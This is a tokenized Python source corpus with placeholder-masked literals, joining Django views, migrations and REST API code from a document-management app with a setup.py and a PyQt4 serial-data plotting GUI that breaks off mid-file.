PermissionDenied : <EOL> AccessControlList . objects . check_access ( <EOL> permission_folder_delete , request . user , folder <EOL> ) <EOL> post_action_redirect = reverse ( '<STR_LIT>' ) <EOL> previous = request . POST . get ( '<STR_LIT>' , request . GET . get ( '<STR_LIT>' , request . META . get ( '<STR_LIT>' , reverse ( settings . LOGIN_REDIRECT_URL ) ) ) ) <EOL> next = request . POST . get ( '<STR_LIT>' , request . GET . get ( '<STR_LIT>' , post_action_redirect if post_action_redirect else request . META . get ( '<STR_LIT>' , reverse ( settings . LOGIN_REDIRECT_URL ) ) ) ) <EOL> if request . method == '<STR_LIT:POST>' : <EOL> try : <EOL> folder . delete ( ) <EOL> messages . success ( request , _ ( '<STR_LIT>' ) % folder ) <EOL> except Exception as exception : <EOL> messages . error ( request , _ ( '<STR_LIT>' ) % { <EOL> '<STR_LIT>' : folder , '<STR_LIT:error>' : exception } ) <EOL> return HttpResponseRedirect ( next ) <EOL> context = { <EOL> '<STR_LIT>' : True , <EOL> '<STR_LIT>' : previous , <EOL> '<STR_LIT>' : next , <EOL> '<STR_LIT:object>' : folder , <EOL> '<STR_LIT:title>' : _ ( '<STR_LIT>' ) % folder , <EOL> } <EOL> return render_to_response ( <EOL> '<STR_LIT>' , context , <EOL> context_instance = RequestContext ( request ) <EOL> ) <EOL> class FolderDetailView ( DocumentListView ) : <EOL> def get_document_queryset ( self ) : <EOL> return self . get_folder ( ) . documents . all ( ) <EOL> def get_extra_context ( self ) : <EOL> return { <EOL> '<STR_LIT:title>' : _ ( '<STR_LIT>' ) % self . get_folder ( ) , <EOL> '<STR_LIT>' : True , <EOL> '<STR_LIT:object>' : self . get_folder ( ) , <EOL> } <EOL> def get_folder ( self ) : <EOL> folder = get_object_or_404 ( Folder , pk = self . kwargs [ '<STR_LIT>' ] ) <EOL> try : <EOL> Permission . check_permissions ( <EOL> self . request . user , ( permission_folder_view , ) <EOL> ) <EOL> except PermissionDenied : <EOL> AccessControlList . objects . check_access ( <EOL> permission_folder_view , self . request . user , folder <EOL> ) <EOL> return folder <EOL> def folder_add_document ( request , document_id = None , document_id_list = None ) : <EOL> if document_id : <EOL> queryset = Document . objects . filter ( pk = document_id ) <EOL> elif document_id_list : <EOL> queryset = Document . objects . filter ( pk__in = document_id_list ) <EOL> if not queryset : <EOL> messages . error ( request , _ ( '<STR_LIT>' ) ) <EOL> return HttpResponseRedirect ( <EOL> request . META . get ( <EOL> '<STR_LIT>' , reverse ( settings . LOGIN_REDIRECT_URL ) <EOL> ) <EOL> ) <EOL> try : <EOL> Permission . check_permissions ( <EOL> request . user , ( permission_folder_add_document , ) <EOL> ) <EOL> except PermissionDenied : <EOL> queryset = AccessControlList . objects . filter_by_access ( <EOL> permission_folder_add_document , request . user , queryset <EOL> ) <EOL> post_action_redirect = None <EOL> if document_id : <EOL> post_action_redirect = reverse ( <EOL> '<STR_LIT>' , args = ( document_id , ) <EOL> ) <EOL> previous = request . POST . get ( '<STR_LIT>' , request . GET . get ( '<STR_LIT>' , request . META . get ( '<STR_LIT>' , reverse ( settings . LOGIN_REDIRECT_URL ) ) ) ) <EOL> next = request . POST . get ( '<STR_LIT>' , request . GET . get ( '<STR_LIT>' , post_action_redirect if post_action_redirect else request . META . get ( '<STR_LIT>' , reverse ( settings . LOGIN_REDIRECT_URL ) ) ) ) <EOL> if request . method == '<STR_LIT:POST>' : <EOL> form = FolderListForm ( request . POST , user = request . user ) <EOL> if form . is_valid ( ) : <EOL> folder = form . cleaned_data [ '<STR_LIT>' ] <EOL> for document in queryset : <EOL> if document . pk not in folder . documents . values_list ( '<STR_LIT>' , flat = True ) : <EOL> folder . documents . add ( document ) <EOL> messages . success ( <EOL> request , _ ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> ) % { <EOL> '<STR_LIT>' : document , '<STR_LIT>' : folder <EOL> } <EOL> ) <EOL> else : <EOL> messages . warning ( <EOL> request , _ ( <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> ) % { <EOL> '<STR_LIT>' : document , '<STR_LIT>' : folder <EOL> } <EOL> ) <EOL> return HttpResponseRedirect ( next ) <EOL> else : <EOL> form = FolderListForm ( user = request . user ) <EOL> context = { <EOL> '<STR_LIT>' : form , <EOL> '<STR_LIT>' : previous , <EOL> '<STR_LIT>' : next , <EOL> } <EOL> if queryset . count ( ) == <NUM_LIT:1> : <EOL> context [ '<STR_LIT:object>' ] = queryset . first ( ) <EOL> context [ '<STR_LIT:title>' ] = ungettext ( <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> queryset . count ( ) <EOL> ) <EOL> return render_to_response ( <EOL> '<STR_LIT>' , context , <EOL> context_instance = RequestContext ( request ) <EOL> ) <EOL> class DocumentFolderListView ( FolderListView ) : <EOL> def dispatch ( self , request , * args , ** kwargs ) : <EOL> self . document = get_object_or_404 ( Document , pk = self . kwargs [ '<STR_LIT>' ] ) <EOL> try : <EOL> Permission . check_permissions ( <EOL> request . user , ( permission_document_view , ) <EOL> ) <EOL> except PermissionDenied : <EOL> AccessControlList . objects . check_access ( <EOL> permission_document_view , request . user , self . document <EOL> ) <EOL> return super ( DocumentFolderListView , self ) . dispatch ( request , * args , ** kwargs ) <EOL> def get_extra_context ( self ) : <EOL> return { <EOL> '<STR_LIT>' : True , <EOL> '<STR_LIT:object>' : self . document , <EOL> '<STR_LIT:title>' : _ ( '<STR_LIT>' ) % self . document , <EOL> } <EOL> def get_folder_queryset ( self ) : <EOL> return self . document . document_folders ( ) . all ( ) <EOL> def folder_document_remove ( request , folder_id , document_id = None , document_id_list = None ) : <EOL> post_action_redirect = None <EOL> folder = get_object_or_404 ( Folder , pk = folder_id ) <EOL> if document_id : <EOL> queryset = Document . objects . filter ( pk = document_id ) <EOL> elif document_id_list : <EOL> queryset = Document . objects . filter ( pk__in = document_id_list ) <EOL> if not queryset : <EOL> messages . error ( request , _ ( '<STR_LIT>' ) ) <EOL> return HttpResponseRedirect ( request . META . get ( '<STR_LIT>' , reverse ( settings . LOGIN_REDIRECT_URL ) ) ) <EOL> try : <EOL> Permission . check_permissions ( <EOL> request . user , ( permission_folder_remove_document , ) <EOL> ) <EOL> except PermissionDenied : <EOL> queryset = AccessControlList . objects . filter_by_access ( <EOL> permission_folder_remove_document , request . user , queryset <EOL> ) <EOL> previous = request . POST . get ( '<STR_LIT>' , request . GET . get ( '<STR_LIT>' , request . META . get ( '<STR_LIT>' , reverse ( settings . LOGIN_REDIRECT_URL ) ) ) ) <EOL> next = request . POST . get ( '<STR_LIT>' , request . GET . get ( '<STR_LIT>' , post_action_redirect if post_action_redirect else request . META . get ( '<STR_LIT>' , reverse ( settings . LOGIN_REDIRECT_URL ) ) ) ) <EOL> if request . method == '<STR_LIT:POST>' : <EOL> for folder_document in queryset : <EOL> try : <EOL> folder . documents . remove ( folder_document ) <EOL> messages . success ( <EOL> request , _ ( <EOL> '<STR_LIT>' <EOL> ) % folder_document <EOL> ) <EOL> except Exception as exception : <EOL> messages . error ( <EOL> request , _ ( <EOL> '<STR_LIT>' <EOL> ) % { <EOL> '<STR_LIT>' : folder_document , '<STR_LIT:error>' : exception <EOL> } <EOL> ) <EOL> return HttpResponseRedirect ( next ) <EOL> context = { <EOL> '<STR_LIT>' : next , <EOL> '<STR_LIT:object>' : folder , <EOL> '<STR_LIT>' : previous , <EOL> '<STR_LIT:title>' : ungettext ( <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> queryset . count ( ) <EOL> ) % { '<STR_LIT>' : folder } <EOL> } <EOL> if queryset . count ( ) == <NUM_LIT:1> : <EOL> context [ '<STR_LIT:object>' ] = queryset . first ( ) <EOL> return render_to_response ( <EOL> '<STR_LIT>' , context , <EOL> context_instance = RequestContext ( request ) <EOL> ) <EOL> def folder_document_multiple_remove ( request , folder_id ) : <EOL> return folder_document_remove ( <EOL> request , folder_id , document_id_list = request . GET . get ( <EOL> '<STR_LIT>' , request . POST . get ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> ) . split ( '<STR_LIT:U+002C>' ) <EOL> ) <EOL> def folder_add_multiple_documents ( request ) : <EOL> return folder_add_document ( <EOL> request , document_id_list = request . GET . get ( <EOL> '<STR_LIT>' , request . POST . get ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> ) . split ( '<STR_LIT:U+002C>' ) <EOL> ) </s>
<s> from __future__ import unicode_literals <EOL> from django . db import models , migrations <EOL> class Migration ( migrations . Migration ) : <EOL> dependencies = [ <EOL> ] <EOL> operations = [ <EOL> migrations . CreateModel ( <EOL> name = '<STR_LIT>' , <EOL> fields = [ <EOL> ( <EOL> '<STR_LIT:id>' , models . AutoField ( <EOL> verbose_name = '<STR_LIT>' , serialize = False , auto_created = True , <EOL> primary_key = True <EOL> ) <EOL> ) , <EOL> ( <EOL> '<STR_LIT>' , models . DateTimeField ( <EOL> auto_now_add = True , verbose_name = '<STR_LIT>' <EOL> ) <EOL> ) , <EOL> ( <EOL> '<STR_LIT>' , models . IntegerField ( <EOL> default = <NUM_LIT:30> , verbose_name = '<STR_LIT>' <EOL> ) <EOL> ) , <EOL> ( <EOL> '<STR_LIT:name>' , models . CharField ( <EOL> unique = True , max_length = <NUM_LIT> , verbose_name = '<STR_LIT:Name>' <EOL> ) <EOL> ) , <EOL> ] , <EOL> options = { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } , <EOL> bases = ( models . Model , ) , <EOL> ) , <EOL> ] </s>
<s> from __future__ import unicode_literals <EOL> from django . db import models , migrations <EOL> class Migration ( migrations . Migration ) : <EOL> dependencies = [ <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ] <EOL> operations = [ <EOL> migrations . CreateModel ( <EOL> name = '<STR_LIT>' , <EOL> fields = [ <EOL> ( <EOL> '<STR_LIT:id>' , models . AutoField ( <EOL> verbose_name = '<STR_LIT>' , serialize = False , <EOL> auto_created = True , primary_key = True <EOL> ) <EOL> ) , <EOL> ( <EOL> '<STR_LIT:value>' , models . CharField ( <EOL> db_index = True , max_length = <NUM_LIT:255> , null = True , <EOL> verbose_name = '<STR_LIT>' , blank = True <EOL> ) <EOL> ) , <EOL> ( <EOL> '<STR_LIT>' , models . ForeignKey ( <EOL> related_name = '<STR_LIT>' , verbose_name = '<STR_LIT>' , <EOL> to = '<STR_LIT>' <EOL> ) <EOL> ) , <EOL> ] , <EOL> options = { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } , <EOL> bases = ( models . Model , ) , <EOL> ) , <EOL> migrations . CreateModel ( <EOL> name = '<STR_LIT>' , <EOL> fields = [ <EOL> ( <EOL> '<STR_LIT:id>' , models . AutoField ( <EOL> verbose_name = '<STR_LIT>' , serialize = False , <EOL> auto_created = True , primary_key = True <EOL> ) <EOL> ) , <EOL> ( <EOL> '<STR_LIT>' , models . BooleanField ( <EOL> default = False , verbose_name = '<STR_LIT>' <EOL> ) <EOL> ) , <EOL> ( <EOL> '<STR_LIT>' , models . ForeignKey ( <EOL> related_name = '<STR_LIT>' , <EOL> verbose_name = '<STR_LIT>' , <EOL> to = '<STR_LIT>' <EOL> ) <EOL> ) , <EOL> ] , <EOL> options = { <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } , <EOL> bases = ( models . Model , ) , <EOL> ) , <EOL> migrations . CreateModel ( <EOL> name = '<STR_LIT>' , <EOL> fields = [ <EOL> ( <EOL> '<STR_LIT:id>' , models . AutoField ( <EOL> verbose_name = '<STR_LIT>' , serialize = False , <EOL> auto_created = True , primary_key = True <EOL> ) <EOL> ) , <EOL> ( <EOL> '<STR_LIT:name>' , models . CharField ( <EOL> help_text = '<STR_LIT>' <EOL> '<STR_LIT>' , unique = True , max_length = <NUM_LIT> , <EOL> verbose_name = '<STR_LIT:Name>' <EOL> ) <EOL> ) , <EOL> ( <EOL> '<STR_LIT:title>' , models . CharField ( <EOL> max_length = <NUM_LIT> , verbose_name = '<STR_LIT>' <EOL> ) <EOL> ) , <EOL> ( <EOL> '<STR_LIT:default>' , models . CharField ( <EOL> help_text = '<STR_LIT>' , <EOL> max_length = <NUM_LIT> , null = True , verbose_name = '<STR_LIT>' , <EOL> blank = True <EOL> ) <EOL> ) , <EOL> ( <EOL> '<STR_LIT>' , models . TextField ( <EOL> help_text = '<STR_LIT>' <EOL> '<STR_LIT>' , null = True , <EOL> verbose_name = '<STR_LIT>' , blank = True ) <EOL> ) , <EOL> ( <EOL> '<STR_LIT>' , models . CharField ( <EOL> blank = True , max_length = <NUM_LIT:64> , <EOL> verbose_name = '<STR_LIT>' , <EOL> choices = [ <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) <EOL> ] <EOL> ) <EOL> ) , <EOL> ] , <EOL> options = { <EOL> '<STR_LIT>' : ( '<STR_LIT:title>' , ) , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> '<STR_LIT>' : '<STR_LIT>' , <EOL> } , <EOL> bases = ( models . Model , ) , <EOL> ) , <EOL> migrations . AddField ( <EOL> model_name = '<STR_LIT>' , <EOL> name = '<STR_LIT>' , <EOL> field = models . ForeignKey ( <EOL> verbose_name = '<STR_LIT>' , to = '<STR_LIT>' <EOL> ) , <EOL> preserve_default = True , <EOL> ) , <EOL> migrations . AlterUniqueTogether ( <EOL> name = '<STR_LIT>' , <EOL> unique_together = set ( [ ( '<STR_LIT>' , '<STR_LIT>' ) ] ) , <EOL> ) , <EOL> migrations . AddField ( <EOL> model_name = '<STR_LIT>' , <EOL> name = '<STR_LIT>' , <EOL> field = models . ForeignKey ( <EOL> verbose_name = '<STR_LIT>' , to = '<STR_LIT>' <EOL> ) , <EOL> preserve_default = True , <EOL> ) , <EOL> migrations . AlterUniqueTogether ( <EOL> name = '<STR_LIT>' , <EOL> unique_together = set ( [ ( '<STR_LIT>' , '<STR_LIT>' ) ] ) , <EOL> ) , <EOL> ] </s>
<s> from __future__ import unicode_literals <EOL> from django . utils . translation import ugettext_lazy as _ <EOL> from common . apps import MayanAppConfig <EOL> class NavigationApp ( MayanAppConfig ) : <EOL> name = '<STR_LIT>' <EOL> test = True <EOL> verbose_name = _ ( '<STR_LIT>' ) </s>
<s> from __future__ import unicode_literals <EOL> from django . utils . translation import ugettext_lazy as _ <EOL> from navigation import Link <EOL> link_api = Link ( <EOL> icon = '<STR_LIT>' , tags = '<STR_LIT>' , text = _ ( '<STR_LIT>' ) , <EOL> view = '<STR_LIT>' <EOL> ) <EOL> link_api_documentation = Link ( <EOL> icon = '<STR_LIT>' , tags = '<STR_LIT>' , text = _ ( '<STR_LIT>' ) , <EOL> view = '<STR_LIT>' <EOL> ) </s>
<s> from __future__ import unicode_literals <EOL> from django . db import models , migrations <EOL> class Migration ( migrations . Migration ) : <EOL> dependencies = [ <EOL> ( '<STR_LIT>' , '<STR_LIT>' ) , <EOL> ] <EOL> operations = [ <EOL> migrations . AddField ( <EOL> model_name = '<STR_LIT>' , <EOL> name = '<STR_LIT>' , <EOL> field = models . CharField ( <EOL> default = '<STR_LIT>' , help_text = '<STR_LIT>' <EOL> '<STR_LIT>' <EOL> '<STR_LIT>' , <EOL> max_length = <NUM_LIT> , verbose_name = '<STR_LIT>' <EOL> ) , <EOL> preserve_default = True , <EOL> ) , <EOL> ] </s>
<s> from __future__ import unicode_literals <EOL> from django import apps <EOL> from django . utils . translation import ugettext_lazy as _ <EOL> class StorageApp ( apps . AppConfig ) : <EOL> name = '<STR_LIT>' <EOL> verbose_name = _ ( '<STR_LIT>' ) </s>
<s> from __future__ import unicode_literals <EOL> from django . contrib . auth . models import Group , User <EOL> from rest_framework import generics <EOL> from rest_api . filters import MayanObjectPermissionsFilter <EOL> from rest_api . permissions import MayanPermission <EOL> from . permissions import ( <EOL> permission_group_create , permission_group_delete , permission_group_edit , <EOL> permission_group_view , permission_user_create , permission_user_delete , <EOL> permission_user_edit , permission_user_view <EOL> ) <EOL> from . serializers import GroupSerializer , UserSerializer <EOL> class APIGroupListView ( generics . ListCreateAPIView ) : <EOL> filter_backends = ( MayanObjectPermissionsFilter , ) <EOL> mayan_object_permissions = { '<STR_LIT:GET>' : ( permission_group_view , ) } <EOL> mayan_view_permissions = { '<STR_LIT:POST>' : ( permission_group_create , ) } <EOL> permission_classes = ( MayanPermission , ) <EOL> queryset = Group . objects . all ( ) <EOL> serializer_class = GroupSerializer <EOL> def get ( self , * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> return super ( APIGroupListView , self ) . get ( * args , ** kwargs ) <EOL> def post ( self , * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> return super ( APIGroupListView , self ) . post ( * args , ** kwargs ) <EOL> class APIGroupView ( generics . RetrieveUpdateDestroyAPIView ) : <EOL> mayan_object_permissions = { <EOL> '<STR_LIT:GET>' : ( permission_group_view , ) , <EOL> '<STR_LIT>' : ( permission_group_edit , ) , <EOL> '<STR_LIT>' : ( permission_group_edit , ) , <EOL> '<STR_LIT>' : ( permission_group_delete , ) <EOL> } <EOL> permission_classes = ( MayanPermission , ) <EOL> queryset = Group . objects . all ( ) <EOL> serializer_class = GroupSerializer <EOL> def delete ( self , * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> return super ( APIGroupView , self ) . delete ( * args , ** kwargs ) <EOL> def get ( self , * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> return super ( APIGroupView , self ) . get ( * args , ** kwargs ) <EOL> def patch ( self , * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> return super ( APIGroupView , self ) . patch ( * args , ** kwargs ) <EOL> def put ( self , * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> return super ( APIGroupView , self ) . put ( * args , ** kwargs ) <EOL> class APIUserListView ( generics . ListCreateAPIView ) : <EOL> filter_backends = ( MayanObjectPermissionsFilter , ) <EOL> mayan_object_permissions = { '<STR_LIT:GET>' : ( permission_user_view , ) } <EOL> mayan_view_permissions = { '<STR_LIT:POST>' : ( permission_user_create , ) } <EOL> permission_classes = ( MayanPermission , ) <EOL> queryset = User . objects . all ( ) <EOL> serializer_class = UserSerializer <EOL> def get ( self , * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> return super ( APIUserListView , self ) . get ( * args , ** kwargs ) <EOL> def post ( self , * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> return super ( APIUserListView , self ) . post ( * args , ** kwargs ) <EOL> class APIUserView ( generics . RetrieveUpdateDestroyAPIView ) : <EOL> mayan_object_permissions = { <EOL> '<STR_LIT:GET>' : ( permission_user_view , ) , <EOL> '<STR_LIT>' : ( permission_user_edit , ) , <EOL> '<STR_LIT>' : ( permission_user_edit , ) , <EOL> '<STR_LIT>' : ( permission_user_delete , ) <EOL> } <EOL> permission_classes = ( MayanPermission , ) <EOL> queryset = User . objects . all ( ) <EOL> serializer_class = UserSerializer <EOL> def delete ( self , * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> return super ( APIUserView , self ) . delete ( * args , ** kwargs ) <EOL> def get ( self , * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> return super ( APIUserView , self ) . get ( * args , ** kwargs ) <EOL> def patch ( self , * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> return super ( APIUserView , self ) . patch ( * args , ** kwargs ) <EOL> def put ( self , * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> return super ( APIUserView , self ) . put ( * args , ** kwargs ) <EOL> class APICurrentUserView ( generics . RetrieveUpdateDestroyAPIView ) : <EOL> serializer_class = UserSerializer <EOL> def get_object ( self ) : <EOL> return self . request . user <EOL> def delete ( self , * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> return super ( APICurrentUserView , self ) . delete ( * args , ** kwargs ) <EOL> def get ( self , * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> return super ( APICurrentUserView , self ) . get ( * args , ** kwargs ) <EOL> def patch ( self , * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> return super ( APICurrentUserView , self ) . patch ( * args , ** kwargs ) <EOL> def put ( self , * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> return super ( APICurrentUserView , self ) . put ( * args , ** kwargs ) </s>
<s> from setuptools import setup <EOL> setup ( <EOL> name = '<STR_LIT>' , <EOL> packages = [ '<STR_LIT>' ] , <EOL> version = '<STR_LIT>' , <EOL> description = '<STR_LIT>' , <EOL> author = '<STR_LIT>' , <EOL> author_email = '<STR_LIT>' , <EOL> url = '<STR_LIT>' , <EOL> download_url = '<STR_LIT>' , <EOL> keywords = [ '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' , '<STR_LIT>' ] , <EOL> classifiers = [ ] , <EOL> entry_points = { <EOL> '<STR_LIT>' : [ <EOL> '<STR_LIT>' <EOL> ] , <EOL> } , <EOL> install_requires = [ <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> '<STR_LIT>' , <EOL> ] <EOL> ) </s>
<s> """<STR_LIT>""" <EOL> import random , sys , Queue , serial , glob , os , csv , time <EOL> import PyQt4 . Qwt5 as Qwt <EOL> from PyQt4 . QtCore import * <EOL> from PyQt4 . QtGui import * <EOL> from com_monitor import ComMonitorThread <EOL> from globals import * <EOL> class PlottingDataMonitor ( QMainWindow ) : <EOL> def __init__ ( self , parent = None ) : <EOL> super ( PlottingDataMonitor , self ) . __init__ ( parent ) <EOL> self . setWindowTitle ( '<STR_LIT>' ) <EOL> self . resize ( <NUM_LIT> , <NUM_LIT> ) <EOL> self . port = "<STR_LIT>" <EOL> self . baudrate = <NUM_LIT> <EOL> self . monitor_active = False <EOL> self . com_monitor = None <EOL> self . com_data_q = None <EOL> self . com_error_q = None <EOL> self . livefeed = LiveDataFeed ( ) <EOL> self . timer = QTimer ( ) <EOL> self . g_samples = [ [ ] , [ ] , [ ] ] <EOL> self . curve = [ None ] * <NUM_LIT:3> <EOL> self . gcurveOn = [ <NUM_LIT:1> ] * <NUM_LIT:3> <EOL> self . csvdata = [ ] <EOL> self . create_menu ( ) <EOL> self . create_main_frame ( ) <EOL> self . create_status_bar ( ) <EOL> self . connect ( self . button_Connect , SIGNAL ( "<STR_LIT>" ) , <EOL> self . OnStart ) <EOL> self . connect ( self . button_Disconnect , SIGNAL ( "<STR_LIT>" ) , <EOL> self . OnStop ) <EOL> def create_com_box ( self ) : <EOL> """<STR_LIT>""" <EOL> self . com_box = QGroupBox ( "<STR_LIT>" ) <EOL> com_layout = QGridLayout ( ) <EOL> self . radio9600 = QRadioButton ( "<STR_LIT>" ) <EOL> self . radio9600 . setChecked ( <NUM_LIT:1> ) <EOL> self . radio19200 = QRadioButton ( "<STR_LIT>" ) <EOL> self . Com_ComboBox = QComboBox ( ) <EOL> com_layout . addWidget ( self . Com_ComboBox , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:1> , <NUM_LIT:2> ) <EOL> com_layout . addWidget ( self . radio9600 , <NUM_LIT:1> , <NUM_LIT:0> ) <EOL> com_layout . addWidget ( self . radio19200 , <NUM_LIT:1> , <NUM_LIT:1> ) <EOL> self . fill_ports_combobox ( ) <EOL> self . button_Connect = QPushButton ( "<STR_LIT>" ) <EOL> self . button_Disconnect = QPushButton ( "<STR_LIT>" ) <EOL> self . button_Disconnect . setEnabled ( False ) <EOL> com_layout . addWidget ( self . button_Connect , <NUM_LIT:0> , <NUM_LIT:2> ) <EOL> com_layout . addWidget ( self . button_Disconnect , <NUM_LIT:1> , <NUM_LIT:2> ) <EOL> return com_layout <EOL> def create_plot ( self ) : <EOL> """<STR_LIT>""" <EOL> plot = Qwt . QwtPlot ( self ) <EOL> plot . setCanvasBackground ( Qt . black ) <EOL> plot . setAxisTitle ( Qwt . QwtPlot . xBottom , '<STR_LIT>' ) <EOL> plot . setAxisScale ( Qwt . QwtPlot . xBottom , <NUM_LIT:0> , <NUM_LIT:10> , <NUM_LIT:1> ) <EOL> plot . setAxisTitle ( Qwt . QwtPlot . yLeft , '<STR_LIT>' ) <EOL> plot . setAxisScale ( Qwt . QwtPlot . yLeft , YMIN , YMAX , ( YMAX - YMIN ) / <NUM_LIT:10> ) <EOL> plot . replot ( ) <EOL> curve = [ None ] * <NUM_LIT:3> <EOL> pen = [ QPen ( QColor ( '<STR_LIT>' ) ) , QPen ( QColor ( '<STR_LIT>' ) ) , QPen ( QColor ( '<STR_LIT>' ) ) ] <EOL> for i in range ( <NUM_LIT:3> ) : <EOL> curve [ i ] = Qwt . QwtPlotCurve ( '<STR_LIT>' ) <EOL> curve [ i ] . setRenderHint ( Qwt . QwtPlotItem . RenderAntialiased ) <EOL> pen [ i ] . setWidth ( <NUM_LIT:2> ) <EOL> curve [ i ] . setPen ( pen [ i ] ) <EOL> curve [ i ] . attach ( plot ) <EOL> return plot , curve <EOL> def create_knob ( self ) : <EOL> """<STR_LIT>""" <EOL> knob = Qwt . QwtKnob ( self ) <EOL> knob . setRange ( <NUM_LIT:0> , <NUM_LIT> , <NUM_LIT:0> , <NUM_LIT:1> ) <EOL> knob . setScaleMaxMajor ( <NUM_LIT:10> ) <EOL> knob . setKnobWidth ( <NUM_LIT:50> ) <EOL> knob . setValue ( <NUM_LIT:10> ) <EOL> return knob <EOL> def create_status_bar ( self ) : <EOL> self . status_text = QLabel ( '<STR_LIT>' ) <EOL> self . statusBar ( ) . addWidget ( self . status_text , <NUM_LIT:1> ) <EOL> def create_checkbox ( self , label , color , connect_fn , connect_param ) : <EOL> """<STR_LIT>""" <EOL> checkBox = QCheckBox ( label ) <EOL> checkBox . setChecked ( <NUM_LIT:1> ) <EOL> checkBox . setFont ( QFont ( "<STR_LIT>" , pointSize = <NUM_LIT:12> , weight = QFont . Bold ) ) <EOL> green = QPalette ( ) <EOL> green . setColor ( QPalette . Foreground , color ) <EOL> checkBox . setPalette ( green ) <EOL> self . connect ( checkBox , SIGNAL ( "<STR_LIT>" ) , partial ( connect_fn , connect_param ) ) <EOL> return checkBox <EOL> def create_main_frame ( self ) : <EOL> """<STR_LIT>""" <EOL> portname_layout = self . create_com_box ( ) <EOL> self . com_box . setLayout ( portname_layout ) <EOL> self . updatespeed_knob = self . create_knob ( ) <EOL> self . connect ( self . updatespeed_knob , SIGNAL ( '<STR_LIT>' ) , <EOL> self . on_knob_change ) <EOL> self . knob_l = QLabel ( '<STR_LIT>' % self . updatespeed_knob . value ( ) ) <EOL> self . knob_l . setAlignment ( Qt . AlignTop | Qt . AlignHCenter ) <EOL> self . plot , self . curve = self . create_plot ( ) <EOL> self . max_spin = QSpinBox ( ) <EOL> self . max_spin . setMaximum ( <NUM_LIT:1000> ) <EOL> self . max_spin . setValue ( <NUM_LIT:1000> ) <EOL> spins_hbox = QHBoxLayout ( ) <EOL> spins_hbox . addWidget ( QLabel ( '<STR_LIT>' ) ) <EOL> spins_hbox . addWidget ( self . max_spin ) <EOL> spins_hbox . addWidget ( QLabel ( '<STR_LIT>' ) ) <EOL> self . gCheckBox = [ self . create_checkbox ( "<STR_LIT>" , Qt . green , self . activate_curve , <NUM_LIT:0> ) , <EOL> self . create_checkbox ( "<STR_LIT>" , Qt . red , self . activate_curve , <NUM_LIT:1> ) , <EOL> self . create_checkbox ( "<STR_LIT>" , Qt . yellow , self . activate_curve , <NUM_LIT:2> ) <EOL> ] <EOL> self . button_clear = QPushButton ( "<STR_LIT>" ) <EOL> self . connect ( self . button_clear , SIGNAL ( "<STR_LIT>" ) , <EOL> self . clear_screen ) <EOL> plot_layout = QGridLayout ( ) <EOL> plot_layout . addWidget ( self . plot , <NUM_LIT:0> , <NUM_LIT:0> , <NUM_LIT:8> , <NUM_LIT:7> ) <EOL> plot_layout . addWidget ( self . gCheckBox [ <NUM_LIT:0> ] , <NUM_LIT:0> , <NUM_LIT:8> ) <EOL> plot_layout . addWidget ( self . gCheckBox [ <NUM_LIT:1> ] , <NUM_LIT:1> , <NUM_LIT:8> ) <EOL> plot_layout . addWidget ( self . gCheckBox [ <NUM_LIT:2> ] , <NUM_LIT:2> , <NUM_LIT:8> ) <EOL> plot_layout . addWidget ( self . button_clear , <NUM_LIT:3> , <NUM_LIT:8> ) <EOL> plot_layout . addLayout ( spins_hbox , <NUM_LIT:4> , <NUM_LIT:8> ) <EOL> plot_layout . addWidget ( self . updatespeed_knob , <NUM_LIT:5> , <NUM_LIT:8> ) <EOL> plot_layout . addWidget ( self . knob_l , <NUM_LIT:6> , <NUM_LIT:8> ) <EOL> plot_groupbox = QGroupBox ( '<STR_LIT>' ) <EOL> plot_groupbox . setLayout ( plot_layout ) <EOL> self . main_frame = QWidget ( ) <EOL> main_layout = QVBoxLayout ( ) <EOL> main_layout . addWidget ( self . com_box ) <EOL> main_layout . addWidget ( plot_groupbox ) <EOL> main_layout . addStretch ( <NUM_LIT:1> ) <EOL> self . main_frame . setLayout ( main_layout ) <EOL> self . setCentralWidget ( self . main_frame ) <EOL> def clear_screen ( self ) : <EOL> g_samples [ <NUM_LIT:0> ] = [ ] <EOL> def activate_curve ( self , axe ) : <EOL> if self . gCheckBox [ axe ] . isChecked ( ) : <EOL> self . gcurveOn [ axe ] = <NUM_LIT:1> <EOL> else : <EOL> self . gcurveOn [ axe ] = <NUM_LIT:0> <EOL> def create_menu ( self ) : <EOL> self . file_menu = self . menuBar ( ) . addMenu ( "<STR_LIT>" ) <EOL> selectport_action = self . create_action ( "<STR_LIT>" , <EOL> shortcut = "<STR_LIT>" , slot = self . on_select_port , tip = "<STR_LIT>" ) <EOL> self . start_action = self . 